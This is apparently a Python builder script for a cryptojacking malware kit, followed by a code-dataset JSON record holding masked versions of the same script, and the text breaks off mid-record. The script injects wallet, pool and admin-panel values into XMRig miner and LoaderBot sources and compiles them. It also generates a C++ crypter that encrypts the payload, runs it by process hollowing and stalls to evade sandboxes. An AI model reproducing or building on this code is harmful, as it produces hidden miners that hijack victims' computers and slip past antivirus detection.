compile(os.getcwd() + '\\Bot\\', 'LoaderBot')
xcopy(os.getcwd() + '\\Bot\\Miner\\bin\\Release\\LoaderBot.exe', 'Bot.exe')
compileR(os.getcwd() + '\\rig\\', 'xmrig')
xcopy(os.getcwd() + '\\rig\\Release\\xmrig.exe', 'out.exe')
crypt('test', key)
os.system('C:\\Python27\\python.exe cv.py')
writeBytes(key)
compileM(os.getcwd() + '\\Miner\\', 'winhost')
xcopy(os.getcwd() + '\\Miner\\Release\\winhost.exe', 'in.exe')
print(os.getcwd() + '\\enc.exe')
subprocess.call(os.getcwd() + '\\enc.exe')
crypt('winhost', key)
os.system('del file.txt')
os.system('del in.exe')
os.system('del out.exe')
os.system('del decr.exe')
os.system('del enc.exe')
os.system('del test.exe')
<|reserved_special_token_1|>
import os, sys, time, random, subprocess
def load_userdata(wallet, pool, ww, logger, adminka):
with open("D:\\msys64\\xmrig-master\\src\\ex.cpp", "r") as f:
file = f.read()
file = file.replace("%u%", wallet)
file = file.replace("%p%", pool)
file = file.replace("%w%", ww)
with open("D:\\msys64\\xmrig-master\\src\\xmrig.cpp", "w") as w:
w.write(file)
with open(os.getcwd()+"\\Bot\\Miner\\ex.cs", "r") as f:
file = f.read()
file = file.replace("%l%", logger)
file = file.replace("%a%", adminka)
with open(os.getcwd()+"\\Bot\\Miner\\Program.cs", "w") as w:
w.write(file)
def writeBytes(key):
with open(os.getcwd()+"\\file.txt", "r") as f:
file = f.read()
with open(os.getcwd()+"\\Miner\\CryptRunPe\\winhost.cpp", "w") as w:
w.write("#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n")
with open("ex.txt") as ex:
w.write(file)
exx = ex.read()
w.write(exx)
def compile(path, file):
os.system("%windir%\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe \""+path+file+".sln\" /p:Configuration=Release")
def compileM(path, file):
os.system("msbuild.exe \""+path+file+".sln\" /p:Configuration=Release")
def compileR(path, file):
os.system("msbuild.exe \""+path+file+".sln\" /p:Configuration=Release /p:Platform=\"WIN32\"")
def xcopy(path, out):
try:
with open(path, "rb") as f:
file = f.read()
with open(out, "wb") as w:
w.write(bytearray(file))
except:
pass
def crypt(name, key):
with open('encoder.cpp', 'w') as w:
txt = '\n\
#include <Windows.h>\n\
#include <winternl.h>\n\
#include <iostream>\n\
#include <string>\n\
#include <fstream>\n\
using namespace std;\n\
int main()\n\
{\n\
FILE * file = fopen("in.exe", "rb");\n\
if (file == NULL) return 0;\n\
fseek(file, 0, SEEK_END);\n\
long int size = ftell(file);\n\
fclose(file);\n\
file = fopen("in.exe", "rb");\n\
unsigned char * in = (unsigned char *)malloc(size);\n\
int bytes_read = fread(in, sizeof(unsigned char), size, file);\n\
fclose(file);\n\
for (int i = 0; i < size; i++) {\n\
in[i] = in[i] - 0x0%n%;\n\
}\n\
file = fopen("out.exe", "wb");\n\
int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n\
fclose(file);\n\
for (int i = 0; i < size; i++) {\n\
in[i] = in[i] + 0x0%n%;\n\
}\n\
file = fopen("decr.exe", "wb");\n\
bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n\
fclose(file);\n\
return 0;\n\
}\n\
'
txt = txt.replace("%n%", str(key))
w.write(txt)
os.system("g++ -o enc encoder.cpp")
os.system("C:\Python27\python.exe cv.py")
with open('file.txt', 'r') as r:
with open(os.getcwd()+"\\src\\crypter\\crypter.cpp", "w") as w:
txt = '\
#include "stdafx.h"\n\
#include "Crypter.h"\n\
#include <windows.h>\n\
#include <winternl.h>\n\
#pragma comment(lib,"ws2_32.lib")\n\
#pragma comment(lib,"ntdll.lib")\n\
'+ r.read() + '\
int RunPortableExecutable(void* Image) {\n\
IMAGE_DOS_HEADER* DOSHeader;\n\
IMAGE_NT_HEADERS* NtHeader;\n\
IMAGE_SECTION_HEADER* SectionHeader;\n\
PROCESS_INFORMATION PI;\n\
STARTUPINFOA SI;\n\
CONTEXT* CTX;\n\
DWORD* ImageBase;\n\
void* pImageBase;\n\
int count;\n\
char buffer[MAX_PATH];\n\
GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n\
char *CurrentFilePath = buffer;\n\
DOSHeader = PIMAGE_DOS_HEADER(Image);\n\
NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n\
if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n\
ZeroMemory(&PI, sizeof(PI));\n\
ZeroMemory(&SI, sizeof(SI));\n\
typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n\
NtUnmapViewOfSection mNtUnmapViewOfSection;\n\
if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n\
CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n\
CTX->ContextFlags = CONTEXT_FULL;\n\
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n\
ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n\
pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n\
NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n\
WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n\
for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n\
SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n\
WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n\
LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n\
}\n\
WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n\
CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n\
SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n\
ResumeThread(PI.hThread);\n\
return 0;\n\
}\n\
}\n\
}\n\
}\n\
int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\n\
for (int i = 0; i < 550000; i++)\n\
OutputDebugStringW(L"");\n\
for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n\
unsigned char b = rawData[i] + 0x0%n%;\n\
rawData[i] = b;\n\
}\n\
Sleep(((rand() % 5 + 1) + 5) * 1000);\n\
RunPortableExecutable(rawData);\n\
return 0;\n\
}\
'
txt = txt.replace("%n%", str(key))
w.write(txt)
compileM(os.getcwd()+"\\src\\", "ConsoleApplication1")
xcopy(os.getcwd() + "\\src\\Release\\Crypter.exe", os.getcwd()+"\\"+name+".exe")
key = random.randint(1, 100)
u = sys.argv[1]
w = sys.argv[2]
p = sys.argv[3]
l = sys.argv[4]
a = sys.argv[5]
load_userdata(u, p, w, l, a)
compile(os.getcwd()+"\\Bot\\", "LoaderBot")
xcopy(os.getcwd()+"\\Bot\\Miner\\bin\\Release\\LoaderBot.exe", "Bot.exe")
compileR(os.getcwd()+"\\rig\\", "xmrig")
xcopy(os.getcwd()+"\\rig\\Release\\xmrig.exe", "out.exe")
crypt("test", key)
os.system("C:\Python27\python.exe cv.py")
writeBytes(key)
compileM(os.getcwd()+"\\Miner\\", "winhost")
xcopy(os.getcwd()+"\\Miner\\Release\\winhost.exe", "in.exe")
print(os.getcwd()+"\\enc.exe")
subprocess.call(os.getcwd()+"\\enc.exe")
crypt("winhost", key)
os.system("del file.txt")
os.system("del in.exe")
os.system("del out.exe")
os.system("del decr.exe")
os.system("del enc.exe")
os.system("del test.exe")
|
flexible
|
{
"blob_id": "d1254e558217cce88de2f83b87d5c54333f1c677",
"index": 9938,
"step-1": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = \"\"\"\n #include <Windows.h>\n #include <winternl.h>\n #include <iostream>\n #include <string>\n #include <fstream>\n using namespace std;\n int main()\n {\n FILE * file = fopen(\"in.exe\", \"rb\");\n if (file == NULL) return 0;\n fseek(file, 0, SEEK_END);\n long int size = ftell(file);\n fclose(file);\n file = fopen(\"in.exe\", \"rb\");\n unsigned char * in = (unsigned char *)malloc(size);\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] - 0x0%n%;\n }\n file = fopen(\"out.exe\", \"wb\");\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] + 0x0%n%;\n }\n file = fopen(\"decr.exe\", \"wb\");\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n return 0;\n }\n \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n os.system('g++ -o enc encoder.cpp')\n os.system('C:\\\\Python27\\\\python.exe cv.py')\n with open('file.txt', 'r') as r:\n with open(os.getcwd() + '\\\\src\\\\crypter\\\\crypter.cpp', 'w') as w:\n txt = \"\"\" #include \"stdafx.h\"\n #include \"Crypter.h\"\n #include <windows.h>\n #include <winternl.h>\n #pragma comment(lib,\"ws2_32.lib\")\n #pragma comment(lib,\"ntdll.lib\")\n \"\"\" + r.read() + \"\"\" int RunPortableExecutable(void* Image) {\n IMAGE_DOS_HEADER* DOSHeader;\n IMAGE_NT_HEADERS* NtHeader;\n IMAGE_SECTION_HEADER* SectionHeader;\n PROCESS_INFORMATION PI;\n STARTUPINFOA SI;\n CONTEXT* CTX;\n DWORD* ImageBase;\n void* pImageBase;\n int count;\n char buffer[MAX_PATH];\n GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n char *CurrentFilePath = buffer;\n DOSHeader = PIMAGE_DOS_HEADER(Image);\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n ZeroMemory(&PI, sizeof(PI));\n ZeroMemory(&SI, 
sizeof(SI));\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n NtUnmapViewOfSection mNtUnmapViewOfSection;\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n CTX->ContextFlags = CONTEXT_FULL;\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n }\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n ResumeThread(PI.hThread);\n return 0;\n }\n }\n }\n }\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\n for (int i = 0; i < 550000; i++)\n OutputDebugStringW(L\"\");\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n unsigned char b = rawData[i] + 0x0%n%;\n rawData[i] = b;\n }\n Sleep(((rand() % 5 + 1) + 5) * 1000);\n RunPortableExecutable(rawData);\n return 0;\n } \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n compileM(os.getcwd() + '\\\\src\\\\', 'ConsoleApplication1')\n xcopy(os.getcwd() + '\\\\src\\\\Release\\\\Crypter.exe', os.getcwd() +\n '\\\\' + name + '.exe')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = \"\"\"\n #include <Windows.h>\n #include <winternl.h>\n #include <iostream>\n #include <string>\n #include <fstream>\n using namespace std;\n int main()\n {\n FILE * file = fopen(\"in.exe\", \"rb\");\n if (file == NULL) return 0;\n fseek(file, 0, SEEK_END);\n long int size = ftell(file);\n fclose(file);\n file = fopen(\"in.exe\", \"rb\");\n unsigned char * in = (unsigned char *)malloc(size);\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] - 0x0%n%;\n }\n file = fopen(\"out.exe\", \"wb\");\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] + 0x0%n%;\n }\n file = fopen(\"decr.exe\", \"wb\");\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n return 0;\n }\n \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n os.system('g++ -o enc encoder.cpp')\n os.system('C:\\\\Python27\\\\python.exe cv.py')\n with open('file.txt', 'r') as r:\n with open(os.getcwd() + '\\\\src\\\\crypter\\\\crypter.cpp', 'w') as w:\n txt = \"\"\" #include \"stdafx.h\"\n #include \"Crypter.h\"\n #include <windows.h>\n #include <winternl.h>\n #pragma comment(lib,\"ws2_32.lib\")\n #pragma comment(lib,\"ntdll.lib\")\n \"\"\" + r.read() + \"\"\" int RunPortableExecutable(void* Image) {\n IMAGE_DOS_HEADER* DOSHeader;\n IMAGE_NT_HEADERS* NtHeader;\n IMAGE_SECTION_HEADER* SectionHeader;\n PROCESS_INFORMATION PI;\n STARTUPINFOA SI;\n CONTEXT* CTX;\n DWORD* ImageBase;\n void* pImageBase;\n int count;\n char buffer[MAX_PATH];\n GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n char *CurrentFilePath = buffer;\n DOSHeader = PIMAGE_DOS_HEADER(Image);\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n ZeroMemory(&PI, sizeof(PI));\n ZeroMemory(&SI, 
sizeof(SI));\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n NtUnmapViewOfSection mNtUnmapViewOfSection;\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n CTX->ContextFlags = CONTEXT_FULL;\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n }\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n ResumeThread(PI.hThread);\n return 0;\n }\n }\n }\n }\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\n for (int i = 0; i < 550000; i++)\n OutputDebugStringW(L\"\");\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n unsigned char b = rawData[i] + 0x0%n%;\n rawData[i] = b;\n }\n Sleep(((rand() % 5 + 1) + 5) * 1000);\n RunPortableExecutable(rawData);\n return 0;\n } \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n compileM(os.getcwd() + '\\\\src\\\\', 'ConsoleApplication1')\n xcopy(os.getcwd() + '\\\\src\\\\Release\\\\Crypter.exe', os.getcwd() +\n '\\\\' + name + '.exe')\n\n\n<mask token>\nload_userdata(u, p, w, l, a)\ncompile(os.getcwd() + '\\\\Bot\\\\', 'LoaderBot')\nxcopy(os.getcwd() + '\\\\Bot\\\\Miner\\\\bin\\\\Release\\\\LoaderBot.exe', 'Bot.exe')\ncompileR(os.getcwd() + '\\\\rig\\\\', 'xmrig')\nxcopy(os.getcwd() + '\\\\rig\\\\Release\\\\xmrig.exe', 'out.exe')\ncrypt('test', key)\nos.system('C:\\\\Python27\\\\python.exe cv.py')\nwriteBytes(key)\ncompileM(os.getcwd() + '\\\\Miner\\\\', 'winhost')\nxcopy(os.getcwd() + '\\\\Miner\\\\Release\\\\winhost.exe', 'in.exe')\nprint(os.getcwd() + '\\\\enc.exe')\nsubprocess.call(os.getcwd() + '\\\\enc.exe')\ncrypt('winhost', key)\nos.system('del file.txt')\nos.system('del in.exe')\nos.system('del out.exe')\nos.system('del decr.exe')\nos.system('del enc.exe')\nos.system('del test.exe')\n",
"step-4": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = \"\"\"\n #include <Windows.h>\n #include <winternl.h>\n #include <iostream>\n #include <string>\n #include <fstream>\n using namespace std;\n int main()\n {\n FILE * file = fopen(\"in.exe\", \"rb\");\n if (file == NULL) return 0;\n fseek(file, 0, SEEK_END);\n long int size = ftell(file);\n fclose(file);\n file = fopen(\"in.exe\", \"rb\");\n unsigned char * in = (unsigned char *)malloc(size);\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] - 0x0%n%;\n }\n file = fopen(\"out.exe\", \"wb\");\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] + 0x0%n%;\n }\n file = fopen(\"decr.exe\", \"wb\");\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n return 0;\n }\n \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n os.system('g++ -o enc encoder.cpp')\n os.system('C:\\\\Python27\\\\python.exe cv.py')\n with open('file.txt', 'r') as r:\n with open(os.getcwd() + '\\\\src\\\\crypter\\\\crypter.cpp', 'w') as w:\n txt = \"\"\" #include \"stdafx.h\"\n #include \"Crypter.h\"\n #include <windows.h>\n #include <winternl.h>\n #pragma comment(lib,\"ws2_32.lib\")\n #pragma comment(lib,\"ntdll.lib\")\n \"\"\" + r.read() + \"\"\" int RunPortableExecutable(void* Image) {\n IMAGE_DOS_HEADER* DOSHeader;\n IMAGE_NT_HEADERS* NtHeader;\n IMAGE_SECTION_HEADER* SectionHeader;\n PROCESS_INFORMATION PI;\n STARTUPINFOA SI;\n CONTEXT* CTX;\n DWORD* ImageBase;\n void* pImageBase;\n int count;\n char buffer[MAX_PATH];\n GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n char *CurrentFilePath = buffer;\n DOSHeader = PIMAGE_DOS_HEADER(Image);\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n ZeroMemory(&PI, sizeof(PI));\n ZeroMemory(&SI, 
sizeof(SI));\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n NtUnmapViewOfSection mNtUnmapViewOfSection;\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n CTX->ContextFlags = CONTEXT_FULL;\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n }\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n ResumeThread(PI.hThread);\n return 0;\n }\n }\n }\n }\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\n for (int i = 0; i < 550000; i++)\n OutputDebugStringW(L\"\");\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n unsigned char b = rawData[i] + 0x0%n%;\n rawData[i] = b;\n }\n Sleep(((rand() % 5 + 1) + 